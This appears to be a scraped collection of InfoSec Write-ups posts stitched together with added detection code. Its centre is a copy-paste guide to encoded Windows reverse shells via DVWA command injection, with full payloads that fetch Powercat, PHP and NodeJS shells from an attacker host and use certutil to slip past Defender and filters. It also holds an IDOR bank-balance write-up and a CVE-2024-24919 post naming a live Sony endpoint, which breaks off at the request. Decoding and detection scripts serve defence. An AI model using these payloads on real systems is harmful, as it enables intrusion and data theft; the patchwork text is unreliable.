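"""Peel base64/base32/hex/octal wrapping off command-injection payloads (added example)."""
import base64
import re
from typing import Dict, List, Tuple

# Strings that mark a spawned network shell once the payload is *decoded*. Matching the
# decoded text, not the submitted one, is what the encoded variants in the post get past.
# (Assumed list for illustration; tune it to your environment.)
SHELL_INDICATORS = ("/dev/tcp/", "bash -i", "sh -i", "mkfifo", "socket.socket",
                    "fsockopen", "socat ", "nc -")

OCTAL_ESC = re.compile(r"\\([0-7]{1,3})")


def decode_octal_printf(fmt: str) -> str:
    """Expand what `printf '<fmt>'` prints: \\NNN octal escapes (1 to 3 digits) and the
    argument-less `%.s` directive, which emits nothing but ends a run of digits.
    Escapes are expanded before `%.s` is removed: in `\\57%.s203` the directive is what
    keeps `203` from being read as part of the octal escape."""
    expanded = OCTAL_ESC.sub(lambda m: chr(int(m.group(1), 8)), fmt)
    return expanded.replace("%.s", "")


def decode_base64(s: str) -> str:
    s = s.strip()
    return base64.b64decode(s + "=" * (-len(s) % 4)).decode("latin-1")


def decode_base32(s: str) -> str:
    s = s.strip()
    return base64.b32decode(s + "=" * (-len(s) % 8)).decode("latin-1")


def decode_hex(s: str) -> str:
    return bytes.fromhex(s).decode("latin-1")


# Each stage is (name, pattern capturing the encoded text, decoder). Patterns are keyed on
# the decoding command that follows the pipe, so a blob is decoded the way the target would.
STAGES = [
    ("base64", re.compile(r"echo\s+(?:-n\s+)?'?([A-Za-z0-9+/=]+)'?\s*\|\s*base64\s+(?:-d|--decode)"), decode_base64),
    ("base32", re.compile(r"echo\s+(?:-n\s+)?'?([A-Z2-7=]+)'?\s*\|\s*base32\s+(?:-d|--decode)"), decode_base32),
    ("hex", re.compile(r"echo\s+(?:-n\s+)?'?([0-9a-fA-F]+)'?\s*\|\s*xxd\s+(?:--ps|-ps|-p)\s+-r"), decode_hex),
    ("octal", re.compile(r"printf\s+'([^']*)'"), decode_octal_printf),
]


def normalise(payload: str, max_depth: int = 4) -> Tuple[str, List[str]]:
    """Replace each recognised `echo X|decoder` or `printf 'X'` with its decoded text,
    repeating so nested wrapping (e.g. base64 inside octal) is peeled too."""
    text, stages = payload, []
    for _ in range(max_depth):
        for name, pattern, decoder in STAGES:
            m = pattern.search(text)
            if m is None:
                continue
            try:
                decoded = decoder(m.group(1))
            except ValueError:  # not valid input for this decoder; leave it alone
                continue
            text = text[: m.start()] + decoded + text[m.end():]
            stages.append(name)
            break
        else:
            break  # no stage matched: fully decoded
    return text, stages


def classify(payload: str) -> Dict[str, object]:
    """Decode a submitted parameter value and report shell indicators found in the result."""
    text, stages = normalise(payload)
    hits = [ind for ind in SHELL_INDICATORS if ind in text]
    return {"decoded": text, "stages": stages, "indicators": hits, "suspicious": bool(hits)}


# Constructed sample parameter values (not captured traffic). The base64 one is the
# construct from the post; the octal one uses the same `%.s` digit-stopping trick as the
# post's "hybrid" payload; the base32 one decodes to a harmless `id`, showing that an
# encoding stage alone is not the signal.
SAMPLES = [
    "127.0.0.1|ls -l",
    "127.0.0.1|echo ZWNobyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE4Ny80NDMgMD4mMSIgfCBiYXNo|base64 -d|sh",
    r"127.0.0.1|printf 'bash\40%.s\55i\40\76\46\40\57dev\57tcp\57%.s203.0.113.5\57%.s443'|sh",
    "127.0.0.1|echo 62617368202d69|xxd --ps -r|sh",
    "127.0.0.1|echo " + base64.b32encode(b"id").decode() + "|base32 -d|sh",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = classify(sample)
        flag = "SUSPICIOUS" if result["suspicious"] else "clean"
        print(f"{flag:10} stages={result['stages']} decoded={result['decoded']!r}")
```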

Summary

This blog describes some techniques for generating encoded Windows reverse shell payloads (I also have a similar article for Linux). There are two main reasons why reverse shell payloads don't work on Windows. First, the payload is typically considered malicious and blocked by Windows Defender. Second, the payload can't get through the Web Application Firewall (WAF) because it contains suspicious strings. To overcome these issues, you need to combine two techniques:
- Use a stealth payload that is streamed over the network
- Use additional payload encoding

In this PoC, we are using a Windows 10 machine with Windows Defender and Windows Firewall enabled. We will simulate a WAF with Damn Vulnerable Web Application (DVWA) with the security level set to high. Also, the attack approach is from a 100% black box perspective with no prior knowledge of the application input validation or prior knowledge of the binaries available on the target web server.

Source: https://www.amazon.com/HackSwagCo-Reverse-Shell-T-Shirt/

Disclaimer

This article is for informational and educational purposes only, and for those who're willing and curious to know and learn about Security and Penetration Testing. The content may not be used for illegal purposes. If you're ready to learn something new for the good, then read on.

Why this blog?

There is a lot of online information about different payloads that can be used to set up a reverse shell. The most notable is the online reverse shell generator (https://www.revshells.com/). This site is really fantastic; it allows you to dynamically generate reverse shell code for Linux, Windows, or MacOS in a variety of languages including Bash, Python, Powershell, etc.

However, of all the Windows based reverse shells in www.revshells.com, not one of them worked with our implementation of the Damn Vulnerable Web Application (DVWA on Xampp) command injection lab for which we set the security level to "high".
When the security level is set to "high", the web server performs extensive input validation, filtering out many characters that are required in the code to spawn a reverse shell. Another key challenge is that we rely on a standard installation of Windows 10. This means that Windows Defender and Windows Firewall are functional and running.

In the first sections, I will show you some encoding techniques to bypass application firewall filtering. In part 2, we will create a list of multiple reverse shells that are not detected by Windows Defender. We will encode them all together into a "master" copy-pastable.

Lab environment

This POC consists of the following machines: an attacker machine (Kali Linux, 172.16.78.251) and a vulnerable Windows web server (Windows 10, 172.16.78.243):

Kali 64-bit [Version 24.2]
IP-Address: 172.16.78.251

DVWA Windows 10
IP-Address: 172.16.78.243
Xampp DVWA vulnerable web server (https://github.com/digininja/DVWA).
Windows 10 Professional [Version 10.0.19045.4780]
Windows Defender and Windows Firewall are turned on
Last update was on Sunday September 8 2024.

I will not explain how to install a DVWA web server on Xampp. The following installation process walkthrough is available: https://www.linkedin.com/pulse/how-setup-dvwa-windows-10-using-xampp-shubham-yadav/.

Part 1: Encoding techniques
Powershell/Powercat reverse shell on DVWA Linux (Security level=High)

Note: it's possible to skip part 1 and directly start with part 2 (steps 8 till 15)

This article is not about the details of exploiting command injection. You can find more information in my other Medium article: https://medium.com/system-weakness/the-ultimate-pen-tester-guide-to-command-injection-d29fac2f4c3b. We will only use the DVWA command injection vulnerability for illustration purposes.
You are allowed to use another way to execute the code snippets in this blog post.

Attack context:
· Target OS: Windows
· DVWA Security level: High
· Vulnerable web site: http://172.16.78.251/dvwa/vulnerabilities/exec/

Let's start with confirming we have our command injection vulnerability when the DVWA Security level is set to "Low".

1. Performed against vulnerable web server, Windows DVWA.

Configure your browser to use Burp Suite as an interceptor tool (we used the Burp Suite integrated browsers). If not done yet, set the DVWA security level to 'low'. Browse to the DVWA Command Injection site (http://192.168.62.165/dvwa/vulnerabilities/exec/).

Perform the 'ping a device' function and ping the loopback address or localhost.

The TTL value (128) tells us it's a Windows web server. The payload is not reflected in the URL, so we also know that we are dealing with a POST request.

Next, we will use the pipe character '|' to trigger the command injection vulnerability. Execute the following command:

127.0.0.1|dir /B

As you can see in the screenshot above, the second "dir /B" command is executed. This means we triggered the command injection vulnerability. In addition to the pipe character '|', the slash character '/' is not filtered.

Next, we will use the command injection vulnerability to set up a reverse shell using Powershell with the Powercat payload (https://github.com/besimorhino/powercat) and certutil.

Why PowerShell and certutil.exe?

The answer is simple: both PowerShell and certutil.exe are shipped with most Windows versions.
You will find Powershell and certutile.exe in Windows 7 or higher.In the next sections, we will setup the following Powershell reverse shells:Plaintext Powershell/Powercat (DVWA low)Base64 encoded Powershell/Powercat (DVWA high)Hexadecimal encoded Powershell/Powercat(DVWA highIn the last section, we will combine multiple reverse shells that are not detected by Windows Defender:Base64 encoded multiple languages (DVWA high)Hexadecimal encoded multiple languages (DVWA high)PlaintextIn my first blog post ever (https://medium.com/system-weakness/evade-windows-defender-reverse-shell-detection-6fa9f5eee1d1) I showed you how you can use Powercat to set up an undetected reverse shell. The actual Powershell command is executed in ‘plaintext’, but the Powercat payload is Base64 encoded. This method still works today!The Powercat payload needs to be steamed over the network. This means that on our attacker machine, in addition to a netcat listener, we will need a web listener.Because of input filtering, this ‘plaintext Powershell/Powercat payload’ only works on the DVWA security level Low. Let go ahead!2. Performed on Kali Linux.Set up a netcat listener.nc -nlvp 443You need to stop and restart this netcat listener after every new encoding technique in this PoC.3. Performed on Kali Linux.Launch a PHP web server. Open a new Bash terminal tab use copy and paste the following code:php -S 0.0.0.0:80 -t /tmpLeave this web server open for the remainder of part 1 of this PoC.4. Performed on Kali Linux.Create encoded Powercat reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=172.16.78.251portnc=443rshell=shell-443.txtpwsh -c "iex (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c $attacker -p $portnc -e cmd.exe -ge" > /tmp/$rshellOur result is the following file in the webroot:/tmp/shell-443.txt5. 
Performed against vulnerable web server, Windows DVWA (Security Level=Low).Download the Powercat code with (plaintext) Powershell. Add the plaintext Powershell payload to the command line injection vulnerability. Use the pipe ''|'' for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|powershell /c $code=(New-Object System.Net.Webclient).DownloadString(''http://172.16.78.251:80/shell-443.txt'');iex ''powershell -E $code''Check out your web server. The Powercat file should be downloaded.Check out your netcat listener. A reverse shell connection is successful.Stop and restart the netcat listener.In the next section, we will use different encoding techniques for the Powershell / Powercat reverse shell. This enables us to set up a reverse shell when the DVWA security level is set to High.Base64 encodingYou may already be familiar with the base64 encoding technique. It converts every 3 bytes into 4 bytes ASCII format. The advantage is that the payload remains relatively short and special characters are neutralized. The base64 can be decoded with Powershell or the certutil.exe tool. Both these tools are present in Windows 7 or higher. The disadvantage of base64 is the usage of the “+” character. In a URL (GET request), the ‘+’ is seen as a space and must be additionally encoded to %2B.The base64 encode payload works up to the DVWA security level High.Note: step 2 should be performed. That means the file /tmp/shell-443.txt is stell in the webroot:6. Performed on Kali Linux.Create Base64 encoded Powershell reverse shell payload. 
Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=172.16.78.251portweb=80rshell=shell-443.txtecho START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString(''http://${attacker}:${portweb}/${rshell}'');iex ''powershell -E \$code''"| base64 -w 0 | tr -d ''\n\r''Our result is the following string:U1RBUlQgL0IgcG93ZXJzaGVsbCAtYyAkY29kZT0oTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xNzIuMTYuNzguMjUxOjgwL3NoZWxsLTQ0My50eHQnKTtpZXggJ3Bvd2Vyc2hlbGwgLUUgJGNvZGUnCg==We will use this string in step 7.7. Performed against vulnerable web server, Windows DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste Base64 code]>b64.txt|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.batOur payload to get a reverse shell:127.0.0.1|echo U1RBUlQgL0IgcG93ZXJzaGVsbCAtYyAkY29kZT0oTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xNzIuMTYuNzguMjUxOjgwL3NoZWxsLTQ0My50eHQnKTtpZXggJ3Bvd2Vyc2hlbGwgLUUgJGNvZGUnCg==>b64.txt|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.batCheck out your web server. The Powercat file should be downloaded.Check out your netcat listener. A reverse shell connection is set up.Stop and restart the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste Base64 code]>b64.txt|certutil+/f+/decode+b64.txt+powercat_shell.bat|START+powercat_shell.batHexadecimal encodingWith certutil.exe it is possible to hexadecimal characters back to plaintext. This technique works well and payload only includes the digits.Note: step 2 should be performed. 
That means the file /tmp/shell-443.txt is still in the webroot of our temporary PHP web server:8. Performed on Kali Linux.Create hexadecimal encoded Powershell reverse shell payload. Open a Bash terminal use copy and paste the following code (adjust the ip-address to you Kali Linux address):attacker=172.16.78.251portweb=80rshell=shell-443.txtecho START /B powershell -c "\$code=(New-Object System.Net.Webclient).DownloadString(''http://${attacker}:${portweb}/${rshell}'');iex ''powershell -E \$code''"| xxd --ps | tr -d ''\n\r''Our result is the following string:5354415254202f4220706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f6465270aWe will use this string in step 9.9. Performed against vulnerable web server, Windows DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. In our case, the final construct is:127.0.0.1|echo [paste hexadecimal code]>hex.txt|certutil /f /decode hex.txt hex_shell.bat|START hex_shell.batOur payload to get a reverse shell:127.0.0.1|echo 5354415254202f4220706f7765727368656c6c202d632024636f64653d284e65772d4f626a6563742053797374656d2e4e65742e576562636c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f3137322e31362e37382e3235313a38302f7368656c6c2d3434332e74787427293b6965782027706f7765727368656c6c202d452024636f6465270a>hex.txt|certutil /f /decodehex hex.txt hex_shell.bat|START hex_shell.batCheck out your web server. The Powercat file should be downloaded.Check out your netcat listener. A reverse shell connection is set up.Stop the netcat listener.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. 
In case of GET requests, you can use the following structure:127.0.0.1|echo+[paste hexadecimal code]>hex.txt|certutil+/f+/decode+hex.txt+hex_shell.bat|START+hex_shell.batPart 2: Concatenate multiple reverse shellsAll Windows versions since Windows 7 are shipped with Powershell and certutil.exe. However, you may encounter a system with no access to Powershell or certutil.exe. For example this could be a nice ‘rabbit hole’ in a CtF competition or in an exam. In the next section, I will show you how to use the hexadecimal encoding technique with multiple Windows reverse shells. We are talking abount Powershell/Powercat, PHP/metasploit and NodeJS. All three are not detected by Windows Defender. If you want to, you can add extra payload like ‘hoax’ shell (https://github.com/t3l3machus/hoaxshell).We will start the whole procedure from scratch.10. Performed on Kali Linux.Open a Bash terminal. Rename this terminal to “web server”. Execute the command below to start simple python web server:python -m http.server -b 0.0.0.0 80 -d /tmpNote: our payload is not compatible with a temporary PHP server (step 3).11. Performed on Kali Linux.Open another Bash terminal. Rename this terminal to “netcat”. Execute the command below to start a netcat listener.nc -nlvp 44312. Performed on Kali Linux.Add encoded Powercat reverse shell code to the web root (same as step 2). Open a Bash terminal tab, use copy and paste to generate Powercat reverse shell code:attacker=172.16.78.251portnc=443rshell=shell-443.txtpwsh -c "iex (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c $attacker -p $portnc -e cmd.exe -ge" > /tmp/$rshell13. Performed on Kali Linux.Add PHP reverse shell code to the web root. In a Bash terminal, use copy and paste to generate Metasploit PHP reverse shell code:attacker=172.16.78.251portnc=443msfvenom -p php/reverse_php LHOST=$attacker LPORT=$portnc -f raw > /tmp/reverse_php.php14. 
Performed on Kali Linux.Create a shells_windows.txt file. This files includes ‘stealth’ reverse shell code Powershell (Powercat), PHP and NodeJS. Open a Bash terminal use copy and paste the following code:attacker=172.16.78.251 portnc=443portweb=80cat << EOF > /tmp/shells_windows.txtphp -d allow_url_fopen=true -r "eval(file_get_contents(''http://${attacker}:${portweb}/reverse_php.php''));"powershell -c \$code=(New-Object System.Net.Webclient).DownloadString(''http://${attacker}:${portweb}/shell-443.txt'');iex ''powershell -E \$code''echo (function(){var net = require(''net''),cp = require(''child_process''),sh = cp.spawn(''cmd'', []);var client = new net.Socket();client.connect(${portnc}, ''${attacker}'', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/; // Prevents > c:/Windows/Tasks/node_shell.jsecho })(); >>c:/Windows/Tasks/node_shell.jsnode c:/Windows/Tasks/node_shell.jsexitEOF15. Performed on Kali Linux.Create different encoded representations of the text file from step 13. Open a Bash terminal use copy and paste the following code:Base64cat /tmp/shells_windows.txt | base64 -w 0 | tr -d ''\n\r''Hexadecimalcat /tmp/shells_windows.txt | xxd --ps | tr -d ''\n\r''Hexadecimal presentation of /tmp/shells_windows.txtResult:We can use the following hexadecimal code in our payload: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 will use this string in step 16.16. Performed against vulnerable web server, Windows DVWA (Security Level=High).Add payload to the command line injection vulnerability. Use the pipe ‘|’ for the second command to execute, like 127.0.0.1|<paste payload here>. 
In our case, the final construct is:127.0.0.1|echo [paste hexadecimal code]>h.txt|certutil /f /decodehex h.txt multiple_shells.bat|START multiple_shells.batOur statement to get a reverse shell:127.0.0.1|echo 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>h.txt|certutil /f /decodehex h.txt multiple_shells.bat|START multiple_shells.batCheck out your web server. The PHP payload file should be downloaded first (on top of our list).Check out your netcat listener. A (php) reverse shell connection is set up.17. Optional: Performed on Kali Linux.We have a reverse shell based on php. This is because php is our first shell in /tmp/shells_windows.txt. You can trigger the next reverse shell by starting another netcat listener (nc -nvlp 443) in a new terminal tab, than exit the current php reverse shell.You can see the next connection (Powershell / Powercat) in terminal tab ‘netcat 2’.Note: If you need to handle GET requests, you must also encode spaces with “+” characters in the URL. In case of GET requests, you can use the following structure.127.0.0.1|echo+[paste hexadecimal code]>h.txt|certutil+/f+/decodehex+h.txt+multiple_shells.bat|START+multiple_shells.batMitigationsBlock all outgoing connections except for specific ports and remote IP addresses for required services. To achieve this, use sandboxing or run your servers in minimal containers. Configure proxy servers with restricted and tightly controlled destinations.Referenceshttps://github.com/digininja/DVWAhttps://portswigger.net/web-security/os-command-injectionhttps://github.com/besimorhino/powercatWindows reverse shell that (almost) always works. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
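
As an added example (not code from the article or from Powercat), the following Python script flags, in process-creation telemetry, the traces this chain leaves on the target: a web-server process spawning cmd.exe, a long base64 or hex token echoed into a file, certutil.exe driven as a decoder with a .bat as its output, and a PowerShell download cradle. The tab-separated event format, the sample events and the rule names are constructed and hypothetical.

```python
"""Process-creation detection for the encoded certutil / PowerShell chain.

Added example, not code from the article.  Events are constructed samples
in an assumed tab-separated "timestamp, parent image, image, command line"
format (a simplified Sysmon Event ID 1 projection, not a real export).
"""
import re
from typing import Dict, List, Tuple

B64_BLOB = "U0FNUExFLUJMT0It" * 3   # constructed: base64("SAMPLE-BLOB-") x3
HEX_BLOB = "53414d504c45" * 8       # constructed: hex("SAMPLE") x8

# Constructed sample events modelled on what the DVWA/Xampp host would log.
SAMPLE_EVENTS = "\n".join([
    "2024-09-08T10:00:01\tC:\\xampp\\apache\\bin\\httpd.exe\tC:\\Windows\\System32\\cmd.exe\t"
    "cmd.exe /c ping 127.0.0.1|echo " + B64_BLOB + ">b64.txt"
    "|certutil /f /decode b64.txt powercat_shell.bat|START powercat_shell.bat",
    "2024-09-08T10:00:01\tC:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\certutil.exe\t"
    "certutil /f /decode b64.txt powercat_shell.bat",
    "2024-09-08T10:00:02\tC:\\xampp\\apache\\bin\\httpd.exe\tC:\\Windows\\System32\\cmd.exe\t"
    "cmd.exe /c ping 127.0.0.1|echo " + HEX_BLOB + ">hex.txt"
    "|certutil /f /decodehex hex.txt hex_shell.bat|START hex_shell.bat",
    "2024-09-08T10:00:02\tC:\\Windows\\System32\\cmd.exe\tC:\\Windows\\System32\\certutil.exe\t"
    "certutil /f /decodehex hex.txt hex_shell.bat",
    "2024-09-08T10:00:03\tC:\\Windows\\System32\\cmd.exe\t"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\t"
    "powershell -c $code=(New-Object System.Net.Webclient).DownloadString("
    "'http://172.16.78.251:80/shell-443.txt');iex 'powershell -E $code'",
    # Two benign events that must not fire.
    "2024-09-08T10:05:00\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\certutil.exe\t"
    "certutil -hashfile C:\\Users\\admin\\setup.msi SHA256",
    "2024-09-08T10:06:00\tC:\\Windows\\explorer.exe\tC:\\Windows\\System32\\cmd.exe\t"
    "cmd.exe /c echo build ok>status.txt",
])

WEB_SERVER_IMAGES = {"httpd.exe", "apache.exe", "php-cgi.exe", "php.exe", "w3wp.exe", "nginx.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# A long base64/hex token echoed into a file (the article's steps 7, 9 and 16).
ECHO_BLOB_RE = re.compile(r"\becho\s+[A-Za-z0-9+/=]{40,}\s*>+\s*[^\s|]+", re.I)
# certutil driven as a decoder; group(1) is the output file it writes.
CERTUTIL_DECODE_RE = re.compile(
    r"\bcertutil(?:\.exe)?\b[^|]*?[/-]decode(?:hex)?\s+[^\s|]+\s+([^\s|]+)", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(?:bat|cmd|ps1|vbs|js|exe|dll)$", re.I)
# PowerShell download cradle: remote content fetched and handed to iex / -E.
PS_DOWNLOAD_RE = re.compile(r"Download(?:String|File|Data)\s*\(", re.I)
PS_EXEC_RE = re.compile(r"\biex\b|Invoke-Expression|\s-E(?:ncodedCommand|C)?\s", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> List[Dict[str, str]]:
    events = []
    for line in text.splitlines():
        parts = line.split("\t", 3)
        if len(parts) != 4:
            continue  # malformed line: skip it rather than abort the scan
        ts, parent, image, cmdline = parts
        events.append({"ts": ts, "parent": basename(parent),
                       "image": basename(image), "cmdline": cmdline})
    return events


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty if none)."""
    hits = []
    cmd = event["cmdline"]
    if event["image"] in SHELL_IMAGES and event["parent"] in WEB_SERVER_IMAGES:
        hits.append("web_server_spawned_shell")
    if ECHO_BLOB_RE.search(cmd):
        hits.append("encoded_blob_written_to_file")
    m = CERTUTIL_DECODE_RE.search(cmd)
    if m and SCRIPT_EXT_RE.search(m.group(1)):
        hits.append("certutil_decode_to_script")
    if PS_DOWNLOAD_RE.search(cmd) and PS_EXEC_RE.search(cmd):
        hits.append("powershell_download_cradle")
    return hits


def scan(text: str) -> List[Tuple[str, str, List[str]]]:
    """(timestamp, image, rules) for every event that tripped at least one rule."""
    findings = []
    for ev in parse_events(text):
        hits = match_rules(ev)
        if hits:
            findings.append((ev["ts"], ev["image"], hits))
    return findings


def summarize(text: str) -> Dict[str, int]:
    """Rule name -> number of events that tripped it."""
    counts: Dict[str, int] = {}
    for _ts, _image, hits in scan(text):
        for rule in hits:
            counts[rule] = counts.get(rule, 0) + 1
    return counts


if __name__ == "__main__":
    for ts, image, hits in scan(SAMPLE_EVENTS):
        print(ts, image, ", ".join(hits))
    print(summarize(SAMPLE_EVENTS))
```

The certutil rule keys on the output file extension rather than on certutil itself, so routine uses such as the -hashfile event stay silent.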

1. HardwareContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Mastering these commands will empower you to effectively investigate and respond to network security incidentsContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Nmap (Network Mapper) is one of the most powerful and widely-used open-source tools for network discovery and security auditing. It’s a…Continue reading on InfoSec Write-ups »

by InfoSec Write-ups

IDOR x Bank = Exposed bank balance.

Alright people, let’s do this one last time. I’m Manav Bankatwala, and I’m a security researcher. I’m not sure what kind of radioactive spider bit me, but it gave me the power to see security vulnerabilities everywhere.

Summary:

The vulnerability I am describing in this writeup is quite old; I found it way back when I was active in bug bounty. Imagine you are asking for money back from your friend, and he/she says, "I am broke." But you find out that he/she is lying because you can hack in and see the actual bank balance of your friend. Aha, you got him.

It’s a very simple vulnerability, but due to the impact I feel compelled to write about it. So, the vulnerability we are talking about here is an IDOR (Insecure Direct Object Reference). I found this vulnerability in one of India’s fastest-growing digital banks. With this IDOR, I was able to see the actual bank balance of any user using their bank account number. Yes, you heard that right. Maybe I saw your bank balance? Haha😉

Background:

So, every month I download my bank statements to see my expenses and manage them. One afternoon, after hunting on a bug bounty program, I thought to log into my bank account and download my statement. But after completing the whole statement download, I realized that I had forgotten to turn off the interception proxy. Due to this, all the requests were captured. I thought to just let it go, but it made me curious and think whether I could find any security vulnerability, and I did find one.

Methodology:

I didn’t want to do much aggressive testing and things like that, so just to keep it simple, I decided to look for IDORs in all the API requests that have account numbers as a parameter.

1. Opened the Burp Suite search tab.
2. I entered my own account number, which gave me a list of endpoints where my account number was provided as a parameter.
3. Out of all, I found an API endpoint at /api/account/v1/m-balance.
4. It was a POST request, and the JSON body contained my account number.

Request

5. I sent this request to Repeater and changed the last two digits of my account number. Upon sending, instead of an error, it gave me the balance of another user's bank account number.

Response

To further test this, I simply sent the request to Intruder and iterated a list of bank account numbers. And ya, I got the bank balance of all the users with just one click. Without wasting time, I made a report and submitted it to the authorities.

But guess what? Banks don’t think that account balance is a sensitive thing to get exposed. They replied, “Through an API, an authenticated user can only enumerate the balance of an account number; no other customer details are exposed through an API. After analyzing the issue, we have categorized it as of ‘Low’ severity.”

Conclusion:

Do you think that bank balance exposure is really not a concern? It’s like posting your bank balance on a notice board. Are you okay if your bank balance is listed on that notice board where anyone can see it? Let me know what your views are on this and in what other ways this could have been exploited. Until then, adiós.

Follow me to get the latest updates:
https://www.linkedin.com/in/manavbankatwala/
https://www.instagram.com/manav.bug/
https://twitter.com/manavbankatwala

Would you mind to tell me what your bank balance is? No? Okay, I’ll hack it. was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

by InfoSec Write-ups
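
As an added example (not code from the write-up or the bank), the following Python models the /api/account/v1/m-balance lookup described above twice: once with only an authentication check, which is the IDOR, and once with the object-level check that ties the requested account to the session user and answers foreign and unknown accounts identically, so the endpoint cannot be iterated as an account-number oracle. The account table, user ids and handler names are constructed and hypothetical.

```python
"""Object-level authorization for an account balance endpoint.

Added example, not code from the write-up.  ACCOUNTS is a constructed
in-memory stand-in for the bank's account store; handler names are
hypothetical.
"""
from dataclasses import dataclass
from typing import Callable, Dict, Iterable, Set, Tuple

# Constructed sample data: account number -> (owner user id, balance).
ACCOUNTS: Dict[str, Tuple[str, float]] = {
    "100000000042": ("user-alice", 15230.50),
    "100000000043": ("user-bob", 980.00),
    "100000000099": ("user-carol", 412000.00),
}


@dataclass
class Response:
    status: int
    body: Dict[str, object]


def vulnerable_balance(session_user: str, body: Dict[str, str]) -> Response:
    """Returns the balance of whatever accountNumber the client sends.

    The caller is authenticated, but the referenced object is never tied
    to the caller: this is the IDOR.  Changing the last digits of the
    account number in the JSON body yields another customer's balance.
    """
    if not session_user:
        return Response(401, {"error": "unauthenticated"})
    account = ACCOUNTS.get(body.get("accountNumber", ""))
    if account is None:
        return Response(404, {"error": "no such account"})
    _owner, balance = account
    return Response(200, {"balance": balance})


def accounts_owned_by(user: str) -> Set[str]:
    return {num for num, (owner, _bal) in ACCOUNTS.items() if owner == user}


def hardened_balance(session_user: str, body: Dict[str, str]) -> Response:
    """Same endpoint with the ownership check the vulnerable version lacks.

    Only accounts owned by the session user are readable.  A foreign
    account and an unknown account get the same 404 so that iterating
    account numbers reveals neither balances nor which numbers exist.
    """
    if not session_user:
        return Response(401, {"error": "unauthenticated"})
    requested = body.get("accountNumber", "")
    if requested not in accounts_owned_by(session_user):
        return Response(404, {"error": "no such account"})
    _owner, balance = ACCOUNTS[requested]
    return Response(200, {"balance": balance})


def probe_balances(handler: Callable[[str, Dict[str, str]], Response],
                   session_user: str, candidates: Iterable[str]) -> Dict[str, float]:
    """Sends one request per candidate account number to a handler and
    collects every balance it returns; used to compare what each leaks."""
    leaked: Dict[str, float] = {}
    for num in candidates:
        resp = handler(session_user, {"accountNumber": num})
        if resp.status == 200:
            leaked[num] = resp.body["balance"]
    return leaked


if __name__ == "__main__":
    # Alice varies the last two digits of her own account number.
    candidates = ["1000000000%02d" % i for i in range(40, 100)]
    print("vulnerable:", probe_balances(vulnerable_balance, "user-alice", candidates))
    print("hardened:  ", probe_balances(hardened_balance, "user-alice", candidates))
```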

Author- Satyam PathaniaContinue reading on InfoSec Write-ups »

by InfoSec Write-ups

Discovering CVE-2024-24919 in Sony’s Check Point Quantum Gateway

As a security researcher, I’m always on the lookout for vulnerabilities in systems, and this time, my journey led me to the Sony HackerOne program. While testing Sony’s Check Point Quantum Gateway, I stumbled upon CVE-2024-24919, an information disclosure vulnerability that allows attackers to access sensitive server information. The best part? My work on this vulnerability ended up earning me some awesome Sony swag!

Here’s how I discovered the vulnerability and what its impact could be on systems still exposed to it.

The Discovery

While participating in the Sony HackerOne program, I discovered a significant issue in the Check Point Quantum Gateway. The flaw was found in a vulnerable endpoint at https://x15.sonydadc.com/clients/MyCRL. This particular configuration involves the IPSec VPN, remote access VPN, or mobile access software blade, and allows an attacker to access sensitive files stored on the server.

Understanding the Vulnerability

Bug Name: Check Point Quantum Gateway — Information Disclosure
Bug Priority: High
Vulnerable URL: https://x15.sonydadc.com/clients/MyCRL

CVE Description:
CVE-2024-24919 is an information disclosure vulnerability that can allow attackers to access certain information on internet-connected Gateways that have been configured with IPSec VPN, remote access VPN, or mobile access software blade. This could result in sensitive data, such as source code or configuration files, being exposed.

Impact

The impact of this vulnerability could be severe, as attackers may gain access to:
Local files on the web server, including configuration files and sensitive data
Application source code or internal secrets
Sensitive information such as database connection strings or access tokens

Proof of Concept (POC)

To automate the process of checking for this vulnerability, I developed a Python tool that makes it easier to test endpoints:

Tool:
pip install CVE-2024-24919
CVE-2024-24919 -u https://x15.sonydadc.com

Here’s a sample POC HTTP Request showing the vulnerability in action:

POST /clients/MyCRL HTTP/1.1
